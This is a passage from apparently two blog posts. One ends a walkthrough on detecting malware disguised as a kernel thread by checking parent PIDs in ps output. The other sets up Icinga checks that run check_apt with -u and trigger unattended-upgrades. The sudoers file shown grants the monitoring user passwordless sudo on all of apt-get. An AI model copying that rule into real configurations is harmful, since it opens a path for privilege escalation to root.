     19       2 root     cpuhp/1         [cpuhp/1]
     20       2 root     migration/1     [migration/1]
     21       2 root     ksoftirqd/1     [ksoftirqd/1]
     23       2 root     kworker/1:0H-ev [kworker/1:0H-events_highpri]
     24       2 root     cpuhp/2         [cpuhp/2]
     25       2 root     migration/2     [migration/2]
     26       2 root     ksoftirqd/2     [ksoftirqd/2]
     28       2 root     kworker/2:0H-ev [kworker/2:0H-events_highpri]
     29       2 root     cpuhp/3         [cpuhp/3]
     30       2 root     migration/3     [migration/3]
     31       2 root     ksoftirqd/3     [ksoftirqd/3]
     33       2 root     kworker/3:0H-ev [kworker/3:0H-events_highpri]
     38       2 root     kdevtmpfs       [kdevtmpfs]
     39       2 root     inet_frag_wq    [inet_frag_wq]
     40       2 root     kauditd         [kauditd]
     41       2 root     khungtaskd      [khungtaskd]
     42       2 root     oom_reaper      [oom_reaper]
     43       2 root     writeback       [writeback]
     44       2 root     kcompactd0      [kcompactd0]
     45       2 root     ksmd            [ksmd]
     46       2 root     khugepaged      [khugepaged]
     47       2 root     kintegrityd     [kintegrityd]
     48       2 root     kblockd         [kblockd]
     49       2 root     blkcg_punt_bio  [blkcg_punt_bio]
     50       2 root     tpm_dev_wq      [tpm_dev_wq]
     51       2 root     edac-poller     [edac-poller]
     52       2 root     devfreq_wq      [devfreq_wq]
     54       2 root     kworker/0:1H-kb [kworker/0:1H-kblockd]
     55       2 root     kswapd0         [kswapd0]
     62       2 root     kthrotld        [kthrotld]
     64       2 root     acpi_thermal_pm [acpi_thermal_pm]
     66       2 root     mld             [mld]
     67       2 root     ipv6_addrconf   [ipv6_addrconf]
     72       2 root     kstrp           [kstrp]
     78       2 root     zswap-shrink    [zswap-shrink]
     79       2 root     kworker/u9:0    [kworker/u9:0]
    123       2 root     kworker/1:1H-kb [kworker/1:1H-kblockd]
    133       2 root     kworker/2:1H-kb [kworker/2:1H-kblockd]
    152       2 root     kworker/3:1H-kb [kworker/3:1H-kblockd]
    154       2 root     ata_sff         [ata_sff]
    155       2 root     scsi_eh_0       [scsi_eh_0]
    156       2 root     scsi_tmf_0      [scsi_tmf_0]
    157       2 root     scsi_eh_1       [scsi_eh_1]
    158       2 root     scsi_tmf_1      [scsi_tmf_1]
    159       2 root     scsi_eh_2       [scsi_eh_2]
    160       2 root     scsi_tmf_2      [scsi_tmf_2]
    173       2 root     kdmflush/254:0  [kdmflush/254:0]
    175       2 root     kdmflush/254:1  [kdmflush/254:1]
    209       2 root     jbd2/dm-0-8     [jbd2/dm-0-8]
    210       2 root     ext4-rsv-conver [ext4-rsv-conver]
    341       2 root     cryptd          [cryptd]
    426       2 root     ext4-rsv-conver [ext4-rsv-conver]
 141234       1 root     sshd            sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
 340800       2 root     kworker/0:0-cgw [kworker/0:0-cgwb_release]
 341004       2 root     kworker/1:1-eve [kworker/1:1-events]
 341535       2 root     kworker/1:2     [kworker/1:2]
 341837       2 root     kworker/2:0-mm_ [kworker/2:0-mm_percpu_wq]
 342029       2 root     kworker/2:1     [kworker/2:1]
 342136  141234 root     sshd            sshd: user [priv]
 342266       2 root     kworker/0:1-eve [kworker/0:1-events]
 342273       2 root     kworker/u8:0-fl [kworker/u8:0-flush-254:0]
 342274       2 root     kworker/3:0-ata [kworker/3:0-ata_sff]
 342278       2 root     kworker/u8:3-ev [kworker/u8:3-events_unbound]
 342279       2 root     kworker/3:1-ata [kworker/3:1-ata_sff]
 342307       2 root     kworker/u8:1-ev [kworker/u8:1-events_unbound]
 342308       2 root     kworker/3:2-eve [kworker/3:2-events]
 342310  342144 user     grep            grep --color=auto \[

Notice something?

There are only 4 processes not having a PPID of 2.

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
      2       0 root     kthreadd        [kthreadd]
 141234       1 root     sshd            sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
 342136  141234 root     sshd            sshd: user [priv]
 342310  342144 user     grep            grep --color=auto \[

One is [kthreadd] who acutally owns PID 2 and got started by PPID 0, second is my grep command and two others are from the sshd but only the [kthreadd] is actually enclosed in square brackets as it doesn't contain any commandline.

If I start a random process and rename it to [gs-dbus], similar to what the CronJob would do, it will show up in the following way:

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
324234  453452 admin     [gs-dbus] [gs-dbus]

PID 324234, PPID 453452 and running under the username admin. Nothing that matches the behaviour of a kernel level thread. And this should raise all red flags your mind possesses.

And this is why basics are so important. Do not just assume a software is doing nothing bad as "There is some piece of legitimate software out there on the Internet sharing the same name.". Anyone can lie. And the bad people most likely are.

Comments

How to monitor your APT-repositories with Icinga

Photo by Pixabay: https://www.pexels.com/photo/software-engineers-working-on-computers-256219/

During my series about unattended-upgrades (Part 1, Part 2) I noticed that a Debian Mirror I use was unresponsive for 22 days but I had nothing to notify me of this. As this also meant that unattended-upgrades didn't apply any patches I wanted a check for this which in turn will trigger unattended-upgrades when there are outstanding updates.

The problem

The monitoring-plugins provide the check_apt plugin. This is normally used to check for available packages. However, in the default configuration it doesn't execute an apt-get update as this requires root privileges. Personally I think the risk is worth the gain. As adding the -u parameter will execute an apt-get update and therefore check_apt will notify you when apt-get update finishes with a non-zero exit-code.

Take the following problem:

root@host:~# apt-get update
Hit:1 http://security.debian.org/debian-security bookworm-security InRelease
Hit:2 http://debian.tu-bs.de/debian bookworm InRelease
Get:3 http://debian.tu-bs.de/debian bookworm-updates InRelease [55.4 kB]
Reading package lists... Done
E: Release file for http://debian.tu-bs.de/debian/dists/bookworm-updates/InRelease is expired (invalid since 16d 0h 59min 33s). Updates for this repository will not be applied.

A mere check_apt wont notify you of any problems:

root@host:~# /usr/lib/nagios/plugins/check_apt
APT CRITICAL: 12 packages available for upgrade (12 critical updates). |available_upgrades=12;;;0 critical_updates=12;;;0

Making this go undetected.

Executed with the -u parameter however, we are notified of the problem:

root@host:~# /usr/lib/nagios/plugins/check_apt -u
'/usr/bin/apt-get -q update' exited with non-zero status.
APT CRITICAL: 12 packages available for upgrade (12 critical updates).  warnings detected, errors detected.|available_upgrades=12;;;0 critical_updates=12;;;0

The solution

Fixing this via Icinga is however a bit more complicated, as the standard apt CheckCommand from the Icinga Template Library (ITL) doesn't include the -u option and isn't prefixed to use sudo despite root privileges being needed. This can be checked here: https://github.com/Icinga/icinga2/blob/master/itl/command-plugins.conf#L2155 or in your local /usr/share/icinga2/include/command-icinga.conf if you happen to use Icinga.

The root cause is also the number one main problem I have with the check_apt CheckPlugin. check_apt is designed to actually install package updates when check_apt reports outstanding available updates. This however breaks the number one paradigm I have regarding monitoring systems: They should not modify the system on their own. And when they do, they should do it in the same way as it is normally done. check_apt breaks this.

Maybe that person should have read a blog article about unattended-upgrades prior to writting that plugin? 😜

Normally you utilize Event Commands for that type of scenario: "If service X is in state Y execute event command Z."

The CheckCommand check_apt_update

Therefore I recommend creating your own apt_update CheckCommand and using that.

object CheckCommand "check_apt_update" {
        command = [ "/usr/bin/sudo", + PluginDir + "/check_apt" ]

        arguments = {
                "-u" = {
                        description = "Perform an apt-get update"
                }
        }
}

Defining the service and configuring the EventCommand

Then in your service definition add a suitable event_command:

apply Service "apt repositories" to Host {
  import "hourly-service"

  check_command = "check_apt_update"

  enable_event_handler = true
  // Execute unattended-upgrades automatically if service goes critical
  event_command = "execute_unattended_upgrades"
  // For services which should be executed ON the host itself
  command_endpoint = host.vars.agent_endpoint

  assign where host.vars.distribution == "Debian"

}

Creating the EventCommand

And create the EventCommand like this:

object EventCommand "execute_unattended_upgrades" {
  command = "sudo /usr/bin/unattended-upgrades"
}

Necessary sudo rights

This requires a sudo config file for the icinga user executing that command. And the commands must be executable without the need for a TTY, hence we end up with the following:

root@host:~# cat /etc/sudoers.d/icinga2
# This line disables the need for a tty for sudo
#  else we will get all kind of "sudo: a password is required" errors
Defaults:icinga2 !requiretty

# sudo rights for Icinga2
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/unattended-upgrades
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/unattended-upgrade
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/apt-get
icinga2  ALL=(ALL) NOPASSWD: /usr/lib/nagios/plugins/check_apt

Conclusion

This is now sufficient as I'm notified when something prevents APT from properly updating the package lists. APT itself takes care to validate the various entries inside the Release file and exits with a non-zero exit-code, so there is no need to put that logic inside of check_apt.

Setting up similar checks for other monitoring systems is of course also possible. In general raising an alarm when apt-get update throws an non-zero exit-code is a somewhat foolproof method.

Comments